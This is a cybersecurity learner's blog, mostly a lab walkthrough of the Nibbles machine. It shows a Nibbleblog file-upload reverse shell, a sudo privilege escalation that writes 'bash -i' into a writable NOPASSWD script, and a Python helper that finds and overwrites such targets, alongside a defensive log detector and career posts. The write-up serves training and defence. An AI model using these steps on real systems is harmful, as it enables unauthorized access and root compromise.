It’s always weird to start a blog post with an image, but that’s what I’m doing here. You see, I’ve got a ton to be thankful for at this point. In the past 7 months, I’ve participated in the SANS Cyber FastTrack, scoring 65th out of 3,498 people. I’ve been generously gifted the PTS Course from eLearnSecurity and obtained my eJPT certification, and now, I’m proud to announce that ActualTom has obtained his first corporate sponsorship from the awesome folks over at CyberSecLabs (https://www.cyberseclabs.co.uk/).
I first met the founder of CyberSecLabs through networking in random InfoSec communities and Discord servers. We discussed my frustrations with HackTheBox’s platform (specifically, the fact the VPN is open to a bunch of users and labs get messed up a lot), and he offered to sponsor a subscription to their platform.
My reviews will be honest and to the point. That said, the Beginner labs in CyberSecLabs are supposed to be good prep for the OSCP certification I’m dutifully working towards.
So, to the team at CyberSecLabs – THANK YOU. Really, from the bottom of my heart, thank you. You guys have gone out of your way to be helpful in your Discord, and you’ve made my life, consisting of a fulltime job, a family, a college degree I’m chasing, a non-profit I’m helping run, and finally my passion, achievable. I look forward to reviewing your platform, and again, thank you.
This is the 2nd box of TJ Null’s OSCP Preparation list, and the first one I’m publishing my writeup for. I recorded the video for YouTube earlier this evening, and I’ll get that posted as soon as my awesome new branding, courtesy of Nathan Cavitt at Mad Standards, comes in!
Once this box is launched, run your standard autorecon scan against it, and wait while it finishes. I tend to add the IP address of the box to my /etc/hosts so I can track the folders easier. As you can see by the screenshot below, port 22 (SSH) and port 80 (HTTP) are open, and the subsequent scans are kicking off.
With CTF-like one-off boxes, the chances of port 22 being the intended way in are slim to none. SSH is rarely the vulnerable service on these, and brute-forcing credentials isn’t normally the goal. Let’s take a look at port 80’s nmap-http scan instead.
When autorecon kicks off the subsequent scans, it runs the appropriate scripts for each port. Great! Here you can see there is an HTML comment in the index page’s source that points you to the nibbleblog directory. Let’s enumerate the nibbleblog directory with gobuster and see what we can find.
Seems pretty standard so far. A login page exists at admin.php, and pulling up the README, you can see that we are running Nibbleblog version 4.0.3. A quick jaunt to Exploit-DB (https://www.exploit-db.com/exploits/38489) shows there is an exploit, but it is an authenticated one: you need the admin username and password first. Time to do some more looking around.
If you try brute-forcing the password with hydra, you will quickly trip Nibbleblog’s blacklist protection, which locks the login and forces you to reset the VM. Luckily, a look at config.xml for hints and a few simple password guesses show that we have a lazy admin here!
At this point you can run Metasploit and get a shell, enabling you to grab the user flag. However, when I went that route, I had issues with privilege escalation that I did not have when I ran the exploit manually, and as I’m prepping for the OSCP, the manual path is the one we will take here. Log in to the website with the above credentials and let’s keep at it!
The exploit, per Exploit-DB and the CVE (https://nvd.nist.gov/vuln/detail/CVE-2015-6967), uses an unrestricted file upload vulnerability in the My Image plugin: an authenticated admin can upload a PHP file instead of an image, and it lands at content/private/plugins/my_image/image.php, where anyone can request it. That’s exactly what we will do. I grabbed a PHP reverse shell courtesy of pentestmonkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php), updated it with my IP address and port, renamed it to image.php, and uploaded it via the Plugins page. Start a netcat listener on the port you chose, then browse to that path and catch the reverse shell!
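Flipping this around to the defender’s side: the one thing the attacker cannot avoid is a direct request to the plugin’s fixed upload path after an authenticated POST to admin.php. The script below is an added example, not from the original post or from Nibbleblog, that runs that check over Apache combined-format access log lines. The log lines are constructed for this example, and the query string on the plugin-config POST is assumed from the Exploit-DB module rather than taken from the post; the detection only keys on POSTs to admin.php and GETs of the image.php path, so that assumption does not affect the result.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Where the My Image plugin drops an upload (path from the CVE / Exploit-DB description).
PAYLOAD_SUFFIX = "/content/private/plugins/my_image/image.php"

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log for this example (not real traffic). The plugin=my_image
# query string on the third line is an assumption taken from the Exploit-DB module.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Jun/2020:19:02:11 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jun/2020:19:02:30 +0000] "POST /nibbleblog/admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jun/2020:19:03:05 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jun/2020:19:03:20 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [20/Jun/2020:19:05:00 +0000] "GET /nibbleblog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.77 - - [21/Jun/2020:08:00:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 404 0 "-" "curl/7.68"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],  # drop the query string
        "status": int(m.group("status")),
    }


def find_my_image_webshells(lines, window=timedelta(minutes=10)):
    """Alert on every request to the plugin's image.php.

    Severity is raised when the same client POSTed to admin.php within `window`
    beforehand (login + plugin upload), which is the exploit's exact sequence.
    """
    events = [e for e in (parse_line(l) for l in lines) if e]
    admin_posts = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"].endswith("/admin.php"):
            admin_posts[e["ip"]].append(e["ts"])

    alerts = []
    for e in events:
        if not e["path"].endswith(PAYLOAD_SUFFIX):
            continue
        preceded = any(timedelta(0) <= e["ts"] - t <= window for t in admin_posts[e["ip"]])
        alerts.append({
            "ip": e["ip"],
            "ts": e["ts"].isoformat(),
            "status": e["status"],
            # 200 = the shell is there and was served; a 404 is still worth a look (probing)
            "severity": "high" if (preceded and e["status"] == 200) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in find_my_image_webshells(SAMPLE_LOG.splitlines()):
        print(a)
```

On a real server, the web shell request usually hangs open while the reverse shell is in use, so the log line only appears once that connection closes; correlate on the admin POSTs as well rather than waiting for the image.php entry alone.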
From here it’s trivial to browse to /home/nibbler and read user.txt. But what is our path to root from this point? The first, and easiest thing to do is check permissions by running sudo -l. As you can see, there’s something of interest here!
Well, you know we have to check that out! Going to that folder, though, all we see is a zip file. Unzipping it gives us the monitor.sh that sudo -l listed. At this point there are a few things we can do. You could edit monitor.sh to run netcat back to another listener you set up, or you can go about it the quick way, like this:
As you can see, we echoed “bash -i” into monitor.sh, overwriting it with a single command that gives us an interactive bash shell. We then ran it with sudo, which, thanks to the NOPASSWD entry, executed it as ROOT without prompting. Once done, we have a root shell! From here it’s trivial to read /root/root.txt and get the flag for your submission!
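The root cause here is a sudo rule whose target lives somewhere the low-privileged user can write. The script below is an added example (mine, not from the post or from the box) that automates the check: it parses sudo -l output, keeps the NOPASSWD-as-root rules, flags any whose target file or containing directory is writable, and then reproduces the post’s one-liner against a throwaway copy. The sudo -l transcript, user and host names, and script location in demo() are all constructed for the example; splitting command lists on commas is a simplification that ignores the rare sudoers entry with a comma inside an argument.

```python
import os
import re
import stat
import tempfile
from dataclasses import dataclass

# One Cmnd_Spec line of `sudo -l` output: "(runas_user[:runas_group]) [TAG:] command[, ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<spec>.+?)\s*$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")


@dataclass(frozen=True)
class SudoRule:
    runas_user: str   # "root", "ALL", or a named user
    command: str      # command spec, e.g. "/home/someone/stuff/monitor.sh" or "ALL"
    nopasswd: bool


def parse_sudo_l(output):
    """Turn `sudo -l` text into SudoRule objects (only the command section is parsed)."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_RE.match(line) if in_commands else None
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip() or "root"
        nopasswd = False  # a tag persists across the comma-separated list until overridden
        for entry in m.group("spec").split(","):
            entry = entry.strip()
            while (t := TAG_RE.match(entry)):
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                entry = entry[t.end():]
            rules.append(SudoRule(runas_user, entry, nopasswd))
    return rules


def hijackable(rules, is_writable=None):
    """Return (rule, reason) pairs for passwordless root rules we can turn into a root shell."""
    if is_writable is None:
        is_writable = lambda p: os.access(p, os.W_OK)
    hits = []
    for r in rules:
        if not r.nopasswd or r.runas_user not in ("root", "ALL"):
            continue
        target = r.command.split()[0] if r.command else ""
        if target == "ALL":
            hits.append((r, "sudo ALL: nothing to overwrite, just run sudo /bin/bash"))
        elif target.startswith("/"):
            if is_writable(target):
                hits.append((r, "target file is writable"))
            elif is_writable(os.path.dirname(target)):
                # Not writable itself, but we can delete/rename it and drop our own in its place
                hits.append((r, "parent directory is writable, file can be replaced"))
    return hits


def overwrite_with_shell(path, command="bash -i"):
    """The post's `echo "bash -i" > monitor.sh` step; returns the sudo command to run next."""
    with open(path, "w") as f:
        f.write(command + "\n")
    # sudo executes the path directly, so the file must stay executable
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return f"sudo {path}"


def demo():
    """End-to-end run in a temp dir against a constructed sudo -l transcript."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "monitor.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho monitoring\n")
        os.chmod(script, 0o755)
        sample = (
            "Matching Defaults entries for someone on box:\n"
            "    env_reset, mail_badpass\n\n"
            "User someone may run the following commands on box:\n"
            f"    (root) NOPASSWD: {script}\n"
            "    (root) /usr/bin/apt-get\n"
        )
        hits = hijackable(parse_sudo_l(sample))
        sudo_cmd = overwrite_with_shell(hits[0][0].command) if hits else None
        body = open(script).read()
        return {"hits": [(h[0].command, h[1]) for h in hits], "sudo_cmd": sudo_cmd, "body": body}


if __name__ == "__main__":
    print(demo())
```

The same function doubles as a hardening audit: any hit is a sudo rule that should point at a root-owned file in a root-owned directory, or should not exist at all.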
I hope you’ve enjoyed the second machine in the TJ Null OSCP Prep list! Stay tuned for more!
This will be Day 3 of my OSCP Preparation. The mind-map linked in the previous post is what I’m still working on, but I just want to first take a moment out of discussing purely hacking to talk about how humbled I am. Veteran Security concluded their board elections a little over a week ago, and on June 1st, 2020, I took over as the Board Chair for the company. It’s an amazing organization owned and run by veterans for veterans transitioning into cyber security. We have some pretty awesome things planned, but that’s nothing compared to what the group has already done for so many, myself included. More than simply providing resources and guides to transition, Veteran Security (VetSec, Inc.) provides a much needed community – a place for veterans to discuss the issues that face our community and be there for one another.
Now then, Day 3 of OSCP. I have completed OverTheWire: Bandit through Level 23, and I have completed Wave 1 of the Zero to Hero blog for TryHackMe. Both platforms have been great for solidifying basic Linux command knowledge, establishing a solid methodology, and exposing me to many different vulnerabilities present in both Linux and Windows.
Much of what I’ve done has been walkthrough style so far. I anticipate around next week (Day 10 OSCP or so) I will move into the lists of machines provided by TJ-Null and start working on VulnHub and HackTheBox machines. This is where it’ll get real.
I continue to make videos for my YouTube Channel, like this walkthrough of LazyAdmin on TryHackMe, and I continue to stream daily. This has been a great way for me to reinforce the knowledge I’ve gained by doing the same box a couple times.
Anyways, if you like following and learning along with me, keep checking out my YouTube and my Twitch and I’ll see you there!
After my stream today I promised I’d post my MindMap for tackling the OSCP. Here is the MM version of it, which you will need the FreeMind software to open it with. If you have any issues, shoot me a message on Discord or comment here!
A short month ago I had this idea in my head, after being exposed to the world of Twitch via my kids and a couple of people I’ve learned from – why not try it myself? So I tugged on my Logitech headset, turned on my webcam, and proceeded to make a fool out of myself attempting to get through rooms on a website called TryHackMe. Thanks to the awesome people in the Ur-Hackr.com Discord, the VetSec Inc. Slack, and my amazing family, I’ve stuck with it now for a month. Monday-Friday, 5pm PST, on Twitch, beating my head against a keyboard.
I also recorded a 5 minute trial course on Cybrary.it, only to seemingly see it fall through (FYI, I got ghosted, for anyone else that gets any of their recruiting emails). I upped my participation in VetSec a bit, and learned a lot about the industry I’m transitioning into. I finished my second course on the path to a Masters Degree, and started the third.
Over the month, I figured my streaming would be a good outlet for me to get some practice time, and if a few people came to say hi online, so be it. I didn’t expect what really happened. In a short month, the generosity of community has been amazing. As I sit writing this, 156 people follow my stream (basically, they’ve agreed to get email notices when I go live). Additionally, 25 people have subscribed in total, which means they’ve paid to eliminate advertisements for themselves on my stream and support me monetarily. I didn’t anticipate either. I had hoped for maybe 25 followers and a couple subs. Blown. Away.
In addition to this, thanks to the leadership at VetSec Inc. and the wonderful sponsorship by eLearnSecurity, I was gifted a Cybersecurity course called Penetration Testing Student. This past week I passed the exam and am now a certified eJPT.
Finally, even though I can’t go into too much details yet, my work with VetSec, Inc., is just beginning. For anyone that is a veteran interested in CyberSecurity, or is active duty and looking for more information on the Information Security domain, please contact me or visit VetSec at https://veteransec.com. My work there is only beginning and I look forward to sharing more of my journey with all of you! Stay tuned!
It’s been a week now since my last post, and I feel like I’ve learned an exponential amount. I haven’t done as much housework as I swore I would while staying home away from COVID-19, and I haven’t worked on my cars like I said I would, either. My garage isn’t perfectly organized like I thought it would be, but man, I’ve learned a ton.
I feel like a week ago I didn’t know anything about penetration testing, at least compared to what I know now. A couple of weeks ago, thanks to the non-profit VeteranSec (www.veteransec.com), I was offered the opportunity to blog for them about my transition from the Navy over the next few years to the Cyber Security field. Then, about a week ago, VeteranSec partnered with eLearnSecurity to give 10 VeteranSec members the Penetration Testing Student (PTS) course and voucher for the eJPT (Junior Penetration Tester) certification. VeteranSec gave me one for being involved in the organization, with the promise of a review of the course for both groups.
So, I started that course. While working on my Masters Program. In addition, to supplement the knowledge that is coming with the PTS, I subscribed to TryHackMe and started working through their rooms. After attending a few conferences with other CyberSecurity personnel on the ‘net, diversifying income streams seemed to be a common thread, along with giving back to the community through teaching, blogging, etc. All of this, I was assured, would help me stand out. So I started this blog, and a nightly stream on Twitch.
For the past week and a half, I’ve sat down at my computer each night, chatted with people, and worked on some TryHackMe rooms, learning some CyberSecurity and teaching what I know to anyone that tunes into my stream. It’s honestly been a wild ride. I am still firmly in the beginner camp, of course, so I didn’t really think I’d have anything to offer many people. Turns out I was a little off in my assumption.
On Twitch, followers are people who sign up to receive notifications that your channel is now streaming. Since I made my account, and played around with streaming at all, it’s been 15 days. In those 15 days, I’ve gained 77 followers. Twitch also has a subscribe option. This gives people the benefit of throwing the streamer they like a few bucks each month to show their appreciation for the content, and in doing so, the streamer can offer benefits such as the ability to show old videos, change the quality of the videos to support a weaker internet connection, etc.
After 15 days, I now have 10 subscribers. One person is enjoying the learning so much, they’ve promised to giveaway one subscription each week in the channel to help me attract viewers. I am honestly, completely blown away. It’s awesome. And the thing is, the money isn’t something I care about one bit. Playing around on places like TryHackMe is something I’d do anyways. Talking to others about Cybersecurity is also something I would do anyways. But to see the level of community development, and to feel like I’m truly helping people – that’s where the reward here is.
And it’s awesome. The community is great, especially online in this venue among infosec people, and it’s awesome to see the support.
I’ll keep writing, too. I started my 3rd class in my Masters program today. I started the 3rd module in my PTS Course, as well. And I’m continuing through TryHackMe. Stay tuned. It’s going to be a wild ride.
In my discussions at places like VetSecCon Jr 2020 (put on by the guys at http://www.veteransec.com), one of the things that has been consistently discussed is how to set yourself apart when you go look at jobs. Numerous ways were discussed, including discussing your home lab, blogs, publications, volunteer work in the Cyber Security community, etc. There are a few people who also include working on pentesting challenges, capture the flags, etc., and even fewer that try teaching those back to the community.
Today I wanted to share some of the links that have gotten me on my way, as well as make a plug for my next project, and hope you all tune in for a bit as well. So, first off, I will be streaming nightly on Twitch. This will include HackTheBox and TryHackMe to begin with. Additionally, I will be discussing general cybersecurity topics and basically anything else the audience wants to see. This will be focused at beginners, and I’ll be learning right along with you guys. My stream will eventually be hosted right here on my website, which is going to be strictly more Cyber Security. All works in progress!
Anyways, here are some things I want to share with you guys, link-wise. These are all resources I have used or have been told great things about.
Twitch Streams: Actual_Tom – My stream, weekdays at 5pm PST. Hope to see some of you there! TheMayor11 – Joe, from CyberSecPadawan. Great stuff, and he’s always helpful! TheCyberMentor – Heath Adams’ stream, weekdays at 9am PST.
VeteranSec – This is a Cyber Security community for military veterans! The Cyber Mentor – Heath Adams’ site, creator of two great Udemy Courses.
TryHackMe – Great site for beginners into CyberSecurity. I have a paid subscription, excellent place to learn. A lot of my streams come from here. CanHackMe – A few interesting challenges. HackTheBox – Spin up a VM and have at it! Less guided than TryHackMe. CyberSecLabs – I see a lot of people working on these now, haven’t done it myself, but they look pretty good!
Udemy – A lot of the courses can be hit or miss. Both by Heath Adams are fantastic. OverTheWire – Gamified Learning of Linux. Great tool. UnderTheWire – Like OverTheWire, but with PowerShell. RegExOne – Learn Regular Expressions. Important! PluralSight – Video based learning. WGU offers alumni free access.
I’m sure there’s more that I’m missing, and I will endeavor to keep this up to date as we go. I’m looking at adding a link list to the side of my page, maybe that’s a good spot for it. Anyways, please tune in to my Twitch Stream, for now, daily at 10pm PST.
There’s a thousand posts about this topic, covering everything from whether Cyber is right for me, to the different certifications one could get, all sorts of stuff. I’m going to try and take a slightly different tack with this one, and talk about learning in general.
You see, I joined in the Navy fresh out of High School. I didn’t even really know what I wanted to do with my life at that point. I didn’t understand what work in the real world was like – up until this point, I’d worked at a small cafe in Port Ludlow (which, unfortunately, went under within the past year), and McDonalds. I knew I liked computers, and I knew my grades weren’t the best. Perfect spot for a Navy recruiter to grab me, I know.
Anyways, after 18 years of service to our country at this point, I’m most grateful to the Navy’s Nuclear Power Program for teaching me how to learn. The academia we go through is very rigorous. It’s extremely fast paced, teaching us the ins and outs of nuclear power inside of 18 months, including how the equipment actually functions well enough for us to do maintenance on it.
So after all this, how do you get started in Cybersecurity? Find out if you like it. Learn about it! Not just how to do the jobs, but what the jobs are about! If you’re a veteran, like me, check out places like VeteranSec. Network on LinkedIn. Peruse Reddit and look through the various groups there. I just did an AMA on Navy Submarine life, look for one on Cybersecurity! There are tons of ways to learn more about the profession. The Cyber Mentor has some great videos on a day in the life of a penetration tester. There are some great blogs, and if you want to actually try some of it out on the red teaming side of the house, then visit sites like Ur-Hackr, TryHackMe, and HackTheBox. For those super new to the profession, I am a big fan of the community that has been built up thus far in Ur-Hackr (of which I am a moderator), so come join us on Discord as well!
I’ll be updating a list of awesome links to gamified resources for hacking, learning cybersecurity, and more on the right sidebar when I get around to it. Until then, try some of the links up above. Remember, especially in our current age of coronavirus, people are our greatest asset. Communicate with them! This community is awesome and we’re all here to help.
This year, as I’m finally on shore duty and headed towards that inevitable transition from the military life, I heard about the Cyber Fast Track offered by the SANS Institute. When I read about it, I was a complete n00b to VetSec (and by many metrics still am). Since then, I’ve discussed CTFs with quite a few people, and when I saw the opportunity to sign up for the SANS Cyber Fast Track CTF, I jumped at the opportunity.
This year, the competition happens in three phases – the first phase was a 48-hour Capture-the-Flag opportunity. The top placers in the CTF are invited to continue on.
The 48-hour CTF was a bit of a doozy for someone who doesn’t have much experience doing CTFs (READ: This was my first). I’d played around in Hack The Box before, and I have a Security+ certification, but nothing would’ve prepared me for this. There were around 45 challenges, covering some general topics like finding a flag in source code, but then delving into Web Exploits, Reverse Engineering, Forensics, Networking, Binary Exploitation, and Cryptography. I settled in with my caffeine supply of choice and proceeded to hammer as many challenges out as I could, while graciously my wife took over the parenting for the next 48 hours.
I slept about 8 hours in the 48 hours, stopping when I hit brick walls so I could let my subconscious do some work. I stayed persistent and taught myself a lot throughout the competition, but was a little bummed when, at the 48-hour mark, I had only completed 63% of all of the challenges. I didn’t think I had done nearly well enough to place to move on.
After the scores were tallied, I found out that, despite only completing 63% of the challenges, I placed 65th out of 3,498 players. Quite a few had signed up and only done a couple challenges, or didn’t play at all. I was stoked!
Just a week ago, I received my invitation email to Phase 2. Phase 2 consists of access to CyberStart Game, a CTF-style playground with 4 months of time in it, covering general topics, python topics, forensics, plus a new base of challenges that haven’t unlocked yet. Additionally, everyone invited to phase 2 gains access to CyberStart Essentials, which is a course described as follows:
reinforcing key concepts with more than 45 in-browser interactive labs and 17 extended practical skill applications in virtual-machine based labs. You’ll establish a core understanding of technology component functions and apply that knowledge to security concepts such as reconstructing a crime from digital evidence or locating exploitable flaws in software and websites.
Plus, at the end of CyberStart Essentials, you will be able to take the GIAC Essentials Exam. Whatever your future cyber career path looks like, this accomplishment will look great on your résumé and support you on your journey.
As of this writing, I haven’t touched Essentials and I’m about 50% of the way done with Game. I plan on keeping up with the persistence, and hopefully finishing all of Game and Essentials. I’d love to get the $22,000 scholarship at the end of this to take the SANS courses, but we’ll see. No matter what, this has been a great learning experience!